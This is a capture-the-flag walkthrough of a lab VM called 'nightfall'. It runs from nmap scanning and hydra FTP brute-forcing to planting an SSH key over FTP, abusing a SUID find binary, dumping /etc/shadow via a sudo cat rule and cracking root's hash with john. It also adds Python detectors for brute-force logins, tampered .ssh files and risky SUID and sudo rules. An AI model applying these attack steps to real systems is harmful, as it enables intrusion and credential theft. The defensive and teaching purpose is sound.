1. Find the target IP: 192.168.0.125
nmap -sn 192.168.0.0/24
2. Scan all of the target's ports
root@kali:~# nmap -A -p- 192.168.0.125
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.0.125
Host is up (0.0018s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.0.125:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 a9:25:e1:4f:41:c6:0f:be:31:21:7b:27:e3:af:49:a9 (RSA)
| 256 38:15:c9:72:9b:e0:24:68:7b:24:4b:ae:40:46:43:16 (ECDSA)
|_ 256 9b:50:3b:2c:48:93:e1:a6:9d:b4:99:ec:60:fb:b6:46 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.15-MariaDB-1
| Thread ID: 12
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, FoundRows, SupportsTransactions, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, LongColumnFlag, SupportsCompression, InteractiveClient, SupportsLoadDataLocal, Speaks41ProtocolOld, IgnoreSigpipes, ODBCClient, ConnectWithDatabase, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: jXY7E6z*^zl1J`'?G'+A
|_ Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:65:A7:16 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: NIGHTFALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h19m58s, deviation: 2h18m34s, median: -1s
|_nbstat: NetBIOS name: NIGHTFALL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: nightfall
| NetBIOS computer name: NIGHTFALL\x00
| Domain name: nightfall
| FQDN: nightfall.nightfall
|_ System time: 2020-07-17T08:30:58-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-07-17T12:30:58
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 1.83 ms 192.168.0.125
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.04 seconds
root@kali:~#
3. The FTP service refuses anonymous login, so set it aside for now.
4. Port 80 serves the Apache2 default page and directory scanning turned up nothing, so set it aside as well.
5. Connecting to SMB shows no share that allows anonymous access.
Run enum4linux to gather SMB information; it reveals two local usernames:
S-1-22-1-1000 Unix User\nightfall (Local User)
S-1-22-1-1001 Unix User\matt (Local User)
Put those two usernames in a user list and run hydra against the FTP login; it finds matt/cheese.
root@kali:~# vim user.txt
root@kali:~# cat user.txt
nightfall
matt
root@kali:~# hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.0.125 ftp -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 28688798 login tries (l:2/p:14344399), ~448263 tries per task
[DATA] attacking ftp://192.168.0.125:21/
[STATUS] 960.00 tries/min, 960 tries in 00:01h, 28687838 to do in 498:04h, 64 active
[STATUS] 1088.00 tries/min, 3264 tries in 00:03h, 28685534 to do in 439:26h, 64 active
[STATUS] 1088.14 tries/min, 7617 tries in 00:07h, 28681181 to do in 439:18h, 64 active
[STATUS] 1105.13 tries/min, 16577 tries in 00:15h, 28672221 to do in 432:25h, 64 active
[21][ftp] host: 192.168.0.125 login: matt password: cheese
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished
root@kali:~#
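The hydra run above is what the attack looks like from the attacker's side; from the FTP server's side it is a burst of failed logins from one address followed by a success. As an added example that is not part of the original write-up, the following Python detector applies two rules over authentication log lines: a sliding-window failure count per source IP, and a success that arrives while that IP still has recent failures. The log lines are constructed here in a generic "timestamp ip OK|FAIL user" layout, not the target's real pyftpdlib output; the regular expression is the only piece that needs adapting to a real server's log format.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines (not output from the target box). The format is a
# generic "timestamp source-ip OK|FAIL user" line; adapt LINE_RE to your server's
# real log format before running this over production logs.
SAMPLE_LOG = [
    f"2020-07-17T08:40:{i:02d} 192.168.0.50 FAIL {'matt' if i % 2 else 'nightfall'}"
    for i in range(12)                              # 12 failures in 12 seconds from one host
] + [
    "2020-07-17T08:40:12 192.168.0.50 OK matt",     # the guess that finally works
    "2020-07-17T08:41:30 192.168.0.77 FAIL matt",   # an ordinary typo from another host
    "2020-07-17T08:41:35 192.168.0.77 OK matt",
    "garbage line that should be ignored",
]

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) (?P<result>OK|FAIL) (?P<user>\S+)$"
)


def parse_line(line):
    """Return (timestamp, ip, success, user) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    return datetime.fromisoformat(m["ts"]), m["ip"], m["result"] == "OK", m["user"]


def find_bruteforce(lines, threshold=10, window=timedelta(seconds=60), min_failures=3):
    """Sliding-window detector. Returns a list of (ip, kind, detail) alerts:
    'burst'                  - an IP reached `threshold` failures inside `window`
    'success_after_failures' - a login succeeded for an IP that still has at least
                               `min_failures` failures inside the window (a likely
                               guessed password, the strongest signal of the two)
    """
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    burst_reported = set()        # report each IP's burst once, not on every extra failure
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, ip, ok, user = rec
        q = recent[ip]
        while q and ts - q[0] > window:   # drop failures that fell out of the window
            q.popleft()
        if ok:
            if len(q) >= min_failures:
                alerts.append((ip, "success_after_failures", f"{user} after {len(q)} failures"))
            q.clear()
            continue
        q.append(ts)
        if len(q) >= threshold and ip not in burst_reported:
            burst_reported.add(ip)
            alerts.append((ip, "burst", f"{len(q)} failures within {int(window.total_seconds())}s"))
    return alerts


if __name__ == "__main__":
    for alert in find_bruteforce(SAMPLE_LOG):
        print(alert)
```

The second rule matters more than the first: rate limiting or fail2ban-style banning stops the burst, but the success-after-failures alert is what tells an analyst that a password was actually guessed and the account needs to be reset.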
6. Log in to the FTP service with those credentials and see what files are there.
root@kali:~# ftp 192.168.0.125
Connected to 192.168.0.125.
220 pyftpdlib 1.5.5 ready.
Name (192.168.0.125:root): matt
331 Username ok, send password.
Password: cheese (typed, not echoed)
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw------- 1 matt matt 0 Aug 28 2019 .bash_history
-rw-r--r-- 1 matt matt 220 Aug 26 2019 .bash_logout
-rw-r--r-- 1 matt matt 3526 Aug 26 2019 .bashrc
drwx------ 3 matt matt 4096 Aug 28 2019 .gnupg
drwxr-xr-x 3 matt matt 4096 Aug 26 2019 .local
-rw-r--r-- 1 matt matt 807 Aug 26 2019 .profile
-rw------- 1 matt matt 0 Aug 28 2019 .sh_history
226 Transfer complete.
ftp>
This listing looks like matt's home directory, so try to get passwordless SSH by uploading an authorized_keys file.
root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:y+KE6DAMQdiB066aDJKAiSyUb+J2YIn6lg2k29X4xq8 root@kali
The key's randomart image is:
+---[RSA 3072]----+
|.=o. |
|=oo |
|B+o |
|BBoo |
|B=+ o S |
|Xo.oo... . |
|O*o=.oo o |
|+== .o+. |
| .. .Eo. |
+----[SHA256]-----+
root@kali:~# cat .ssh/id_rsa.pub > authorized_keys
root@kali:~# ftp 192.168.0.125
Connected to 192.168.0.125.
220 pyftpdlib 1.5.5 ready.
Name (192.168.0.125:root): matt
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir .ssh
257 "/.ssh" directory created.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw------- 1 matt matt 0 Aug 28 2019 .bash_history
-rw-r--r-- 1 matt matt 220 Aug 26 2019 .bash_logout
-rw-r--r-- 1 matt matt 3526 Aug 26 2019 .bashrc
drwx------ 3 matt matt 4096 Aug 28 2019 .gnupg
drwxr-xr-x 3 matt matt 4096 Aug 26 2019 .local
-rw-r--r-- 1 matt matt 807 Aug 26 2019 .profile
-rw------- 1 matt matt 0 Aug 28 2019 .sh_history
drwxr-xr-x 2 root root 4096 Jul 17 13:52 .ssh
226 Transfer complete.
ftp> cd .ssh
250 "/.ssh" is the current directory.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
16 bytes sent in 0.00 secs (85.3825 kB/s)
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r-- 1 root root 16 Jul 17 13:52 authorized_keys
226 Transfer complete.
ftp> exit
221 Goodbye.
root@kali:~# ssh -i .ssh/id_rsa matt@192.168.0.125
Linux nightfall 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u2 (2019-08-08) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Aug 28 18:31:27 2019 from 192.168.1.182
matt@nightfall:~$
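Two details in the FTP session above explain why this worked and what a defender should look for: the .ssh directory and authorized_keys came out owned by root:root, so the FTP daemon was writing into home directories as root, and sshd's StrictModes accepts files owned by either the user or root, so it did not object. As an added example that is not part of the original write-up, the following Python audit flags .ssh entries whose owner differs from the home directory's owner, loose permissions, and an authorized_keys file too small to hold a real key line. The sample records are constructed from the listing above (uid 1001 for matt is taken from the enum4linux SID earlier on the page; the exact mode bits are assumed from the ls output); collect_ssh_entries and audit_all_homes are the live-host versions of the same check.

```python
import os
import stat
from dataclasses import dataclass


@dataclass
class Entry:
    path: str
    uid: int    # owner uid from lstat
    mode: int   # full st_mode (file-type bits plus permission bits)
    size: int


# Constructed records mirroring the FTP listing in the write-up: matt's home
# (uid 1001 per the enum4linux SIDs) holding a .ssh directory and an authorized_keys
# file that are owned by root because the FTP daemon wrote them. Mode bits assumed.
SAMPLE_HOME_UID = 1001
SAMPLE_ENTRIES = [
    Entry("/home/matt/.ssh", 0, stat.S_IFDIR | 0o755, 4096),
    Entry("/home/matt/.ssh/authorized_keys", 0, stat.S_IFREG | 0o644, 16),
]

MIN_KEY_LINE = 64  # shorter than any real public-key line; a 16-byte file cannot hold one


def audit_ssh_dir(home_uid, entries):
    """Return (path, code) findings for a user's .ssh directory and authorized_keys.

    Codes:
      foreign_owner            - not owned by the home directory's owner; root ownership
                                 still passes sshd StrictModes, so it must be caught here
      group_or_world_writable  - another process could append keys
      loose_dir_mode           - .ssh should be 0700
      too_small                - file cannot contain a valid public-key line
    """
    findings = []
    for e in entries:
        perm = stat.S_IMODE(e.mode)
        if e.uid != home_uid:
            findings.append((e.path, "foreign_owner"))
        if perm & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((e.path, "group_or_world_writable"))
        if stat.S_ISDIR(e.mode) and perm != 0o700:
            findings.append((e.path, "loose_dir_mode"))
        if stat.S_ISREG(e.mode) and 0 < e.size < MIN_KEY_LINE:
            findings.append((e.path, "too_small"))
    return findings


def collect_ssh_entries(home):
    """Gather live records for one home directory (for a real host; not used by the test)."""
    ssh_dir = os.path.join(home, ".ssh")
    entries = []
    for p in (ssh_dir, os.path.join(ssh_dir, "authorized_keys")):
        try:
            st = os.lstat(p)
        except FileNotFoundError:
            continue
        entries.append(Entry(p, st.st_uid, st.st_mode, st.st_size))
    return entries


def audit_all_homes(home_root="/home"):
    """Run the audit over every directory under home_root; returns {home: findings}."""
    report = {}
    for name in os.listdir(home_root):
        home = os.path.join(home_root, name)
        if os.path.isdir(home):
            report[home] = audit_ssh_dir(os.lstat(home).st_uid, collect_ssh_entries(home))
    return report


if __name__ == "__main__":
    for path, code in audit_ssh_dir(SAMPLE_HOME_UID, SAMPLE_ENTRIES):
        print(f"{path}: {code}")
```

The structural fix is not in this script: an FTP daemon should never run as root with a user's home directory as its root, and sshd's AuthorizedKeysFile can be pointed at a root-owned location outside the home directory so that nothing writing into $HOME can grant SSH access. The audit is the detective control that catches the situation when that is not the case.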
sudo -l prompts for a password, so list the SUID files directly instead; /scripts/find stands out.
matt@nightfall:~$ find / -perm -4000 2>/dev/null
/scripts/find
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/su
/usr/lib
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
matt@nightfall:~$
Check its attributes and file type: it is an executable owned by nightfall and presumably works just like the regular find command.
matt@nightfall:~$ ls -l /scripts/find
-rwsr-sr-x 1 nightfall nightfall 315904 Aug 28 2019 /scripts/find
matt@nightfall:~$ file /scripts/find
/scripts/find: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=77494c30a19019ecb995eeb74250aa57c073c635, stripped
matt@nightfall:~$
Use /scripts/find to escalate to nightfall and grab the first flag.
bash-5.0$ ls /home
matt nightfall
bash-5.0$ cd /home/nightfall
bash-5.0$ ls
user.txt
bash-5.0$ cat user.txt
97fb7140ca325ed96f67be3c9e30083d
bash-5.0$
sudo -l in this shell still asks for matt's password (the SUID shell only changed the effective UID, and sudo identifies the caller by the real UID), so copy the uploaded .ssh directory into nightfall's home to get passwordless SSH as nightfall.
bash-5.0$ ls -la
total 36
drwxr-xr-x 4 nightfall nightfall 4096 Jul 17 10:15 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 nightfall nightfall 0 Aug 28 2019 .bash_history
-rw-r--r-- 1 nightfall nightfall 220 Aug 17 2019 .bash_logout
-rw-r--r-- 1 nightfall nightfall 3526 Aug 17 2019 .bashrc
drwx------ 3 nightfall nightfall 4096 Aug 28 2019 .gnupg
drwxr-xr-x 3 nightfall nightfall 4096 Aug 17 2019 .local
-rw------- 1 nightfall nightfall 337 Aug 17 2019 .mysql_history
-rw-r--r-- 1 nightfall nightfall 807 Aug 17 2019 .profile
-rw------- 1 nightfall nightfall 33 Aug 28 2019 user.txt
bash-5.0$ cp -r /home/matt/.ssh/ .
bash-5.0$ ls -la
total 40
drwxr-xr-x 5 nightfall nightfall 4096 Jul 17 10:16 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 nightfall nightfall 0 Aug 28 2019 .bash_history
-rw-r--r-- 1 nightfall nightfall 220 Aug 17 2019 .bash_logout
-rw-r--r-- 1 nightfall nightfall 3526 Aug 17 2019 .bashrc
drwx------ 3 nightfall nightfall 4096 Aug 28 2019 .gnupg
drwxr-xr-x 3 nightfall nightfall 4096 Aug 17 2019 .local
-rw------- 1 nightfall nightfall 337 Aug 17 2019 .mysql_history
-rw-r--r-- 1 nightfall nightfall 807 Aug 17 2019 .profile
drwxr-xr-x 2 nightfall nightfall 4096 Jul 17 10:16 .ssh
-rw------- 1 nightfall nightfall 33 Aug 28 2019 user.txt
bash-5.0$ cd .ssh
bash-5.0$ ls
authorized_keys
root@kali:~# ssh -i .ssh/id_rsa nightfall@192.168.0.125
Linux nightfall 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u2 (2019-08-08) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Aug 28 18:35:04 2019 from 192.168.1.182
nightfall@nightfall:~$
sudo -l shows that cat can be run as root without a password, so use it to read /etc/shadow.
nightfall@nightfall:~$ sudo -l
Matching Defaults entries for nightfall on nightfall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User nightfall may run the following commands on nightfall:
(root) NOPASSWD: /usr/bin/cat
nightfall@nightfall:~$ sudo cat /etc/shadow
root:$6$JNHsN5GY.jc9CiTg$MjYL9NyNc4GcYS2zNO6PzQNHY2BE/YODBUuqsrpIlpS9LK3xQ6coZs6lonzURBJUDjCRegMHSF5JwCMG1az8k.:18134:0:99999:7:::
daemon:*:18126:0:99999:7:::
bin:*:18126:0:99999:7:::
sys:*:18126:0:99999:7:::
sync:*:18126:0:99999:7:::
games:*:18126:0:99999:7:::
man:*:18126:0:99999:7:::
lp:*:18126:0:99999:7:::
mail:*:18126:0:99999:7:::
news:*:18126:0:99999:7:::
uucp:*:18126:0:99999:7:::
proxy:*:18126:0:99999:7:::
www-data:*:18126:0:99999:7:::
backup:*:18126:0:99999:7:::
list:*:18126:0:99999:7:::
irc:*:18126:0:99999:7:::
gnats:*:18126:0:99999:7:::
nobody:*:18126:0:99999:7:::
_apt:*:18126:0:99999:7:::
systemd-timesync:*:18126:0:99999:7:::
systemd-network:*:18126:0:99999:7:::
systemd-resolve:*:18126:0:99999:7:::
messagebus:*:18126:0:99999:7:::
avahi-autoipd:*:18126:0:99999:7:::
avahi:*:18126:0:99999:7:::
saned:*:18126:0:99999:7:::
colord:*:18126:0:99999:7:::
hplip:*:18126:0:99999:7:::
nightfall:$6$u9n0NMGDN2h3/Npy$y/PVdaqMcdobHf4ZPvbrHNFMwMkPWwamWuKGxn2wqJygEC09UNJNb10X0HBK15Hs4ZwyFtdwixyyfu2QEC1U4/:18134:0:99999:7:::
systemd-coredump:!!:18126::::::
sshd:*:18126:0:99999:7:::
mysql:!:18126:0:99999:7:::
matt:$6$2u38Z1fOk8zIC5kO$oSfp/Ic0Uhb9225EdHB63ugob.B58mPuJJ8YpMB9hNaZAoJk9n3rhs9DHobzmsB20E5Yxjqsnn1x.QGKeAmiR1:18134:0:99999:7:::
nightfall@nightfall:~$
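Both privilege-escalation steps on this box, the SUID copy of find in /scripts and the NOPASSWD sudo rule for cat, are the kind of misconfiguration a periodic host audit should surface before an attacker does. As an added example that is not part of the original write-up, the following Python script does both checks: unusual_suid flags SUID/SGID files outside the package-managed directories or owned by a non-root user (the SUID listing here is constructed from the find output above, with uid 1000 for nightfall taken from the enum4linux SID and the mode bits assumed from ls -l), and risky_sudo_rules parses sudo -l output and flags rules that need no password or hand out a generic file reader (the sample text is the box's sudo -l output plus one constructed, benign apt-get rule for contrast). collect_suid is the live-host collector for a real run.

```python
import os
import re
import stat

# Directories where distribution packages legitimately install SUID/SGID binaries.
STANDARD_SUID_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/", "/usr/libexec/")

# Constructed from the `find / -perm -4000` listing in the write-up (uid 1000 = nightfall
# per the enum4linux SIDs; the mode bits are assumed from the ls -l line).
SAMPLE_SUID = [
    ("/scripts/find", stat.S_IFREG | 0o6755, 1000),
    ("/usr/bin/sudo", stat.S_IFREG | 0o4755, 0),
    ("/usr/bin/passwd", stat.S_IFREG | 0o4755, 0),
    ("/usr/lib/openssh/ssh-keysign", stat.S_IFREG | 0o4755, 0),
]

# The box's `sudo -l` output plus one constructed, benign rule for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for nightfall on nightfall:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
User nightfall may run the following commands on nightfall:
    (root) NOPASSWD: /usr/bin/cat
    (root) /usr/bin/apt-get update
"""


def collect_suid(root="/"):
    """Walk a live filesystem and return (path, st_mode, st_uid) for SUID/SGID regular files."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append((path, st.st_mode, st.st_uid))
    return found


def unusual_suid(records, known_dirs=STANDARD_SUID_DIRS):
    """Flag SUID/SGID files outside package-managed directories or not owned by root.
    A non-root SUID binary hands that user's identity to anyone allowed to run it."""
    findings = []
    for path, _mode, uid in records:
        reasons = []
        if not path.startswith(known_dirs):
            reasons.append("outside standard directories")
        if uid != 0:
            reasons.append(f"owned by uid {uid}, not root")
        if reasons:
            findings.append((path, reasons))
    return findings


# Matches rule lines such as "(root) NOPASSWD: /usr/bin/cat"; header and Defaults lines do not match.
SUDO_RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")
FILE_READERS = {"cat", "tac", "head", "tail", "less", "more", "grep", "strings"}


def risky_sudo_rules(sudo_l_output):
    """Parse `sudo -l` rule lines and flag rules that need no password or that grant a
    generic file reader, which exposes /etc/shadow and every other root-only file."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE_RE.match(line.strip())
        if m is None:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for cmd in m["cmd"].split(","):
            cmd = cmd.strip()
            program = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
            reasons = []
            if "NOPASSWD" in tags:
                reasons.append("no password required")
            if program == "ALL" or program in FILE_READERS:
                reasons.append(f"can read any file as {m['runas']}")
            if reasons:
                findings.append((cmd, m["runas"], reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in unusual_suid(SAMPLE_SUID):
        print(f"SUID {path}: {'; '.join(reasons)}")
    for cmd, runas, reasons in risky_sudo_rules(SAMPLE_SUDO_L):
        print(f"sudo ({runas}) {cmd}: {'; '.join(reasons)}")
```

On a real host, feed collect_suid() into unusual_suid() and the text of `sudo -l` (or each user's sudoers fragment) into risky_sudo_rules(); the remediation for both findings on this box is the same, namely removing the extra binary and replacing the blanket cat rule with a rule limited to the specific file the user actually needs.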
Copy root's line to the local machine and run john against it; it recovers root's password, miguel2.
root@kali:~# echo 'root:$6$JNHsN5GY.jc9CiTg$MjYL9NyNc4GcYS2zNO6PzQNHY2BE/YODBUuqsrpIlpS9LK3xQ6coZs6lonzURBJUDjCRegMHSF5JwCMG1az8k.:18134:0:99999:7:::' > shadow.txt
root@kali:~# john shadow.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
miguel2 (root)
1g 0:00:02:01 DONE 2/3 (2020-07-17 22:26) 0.008216g/s 266.6p/s 266.6c/s 266.6C/s miguel2..rafael2
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~#
SSH as root fails (root login is presumably disabled), so run su in the existing SSH session instead and get the final flag. (The filename is deliberately convoluted so that it cannot simply be guessed and read with sudo cat.)
nightfall@nightfall:~$ su
Password:
root@nightfall:/home/nightfall# cd ~
root@nightfall:~# ls
root_super_secret_flag.txt
root@nightfall:~# cat root_super_secret_flag.txt
Congratulations! Please contact me via twitter and give me some feedback! @whitecr0w1
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
.................................................................................................................................................................................................................
................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...................................................................................
..............................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.................................................................................
............................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...............................................................................
..........................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.............................................................................
........................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...........................................................................
......................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.........................................................................
....................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.......................................................................
...................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@......................................................................
..................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.....................................................................
.................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@....................................................................
................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...................................................................
................................................................&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&...................................................................
~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~
Thank you for playing! - Felipe Winsnes (whitecr0wz) flag{9a5b21fc6719fe33004d66b703d70a39}
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
root@nightfall:~#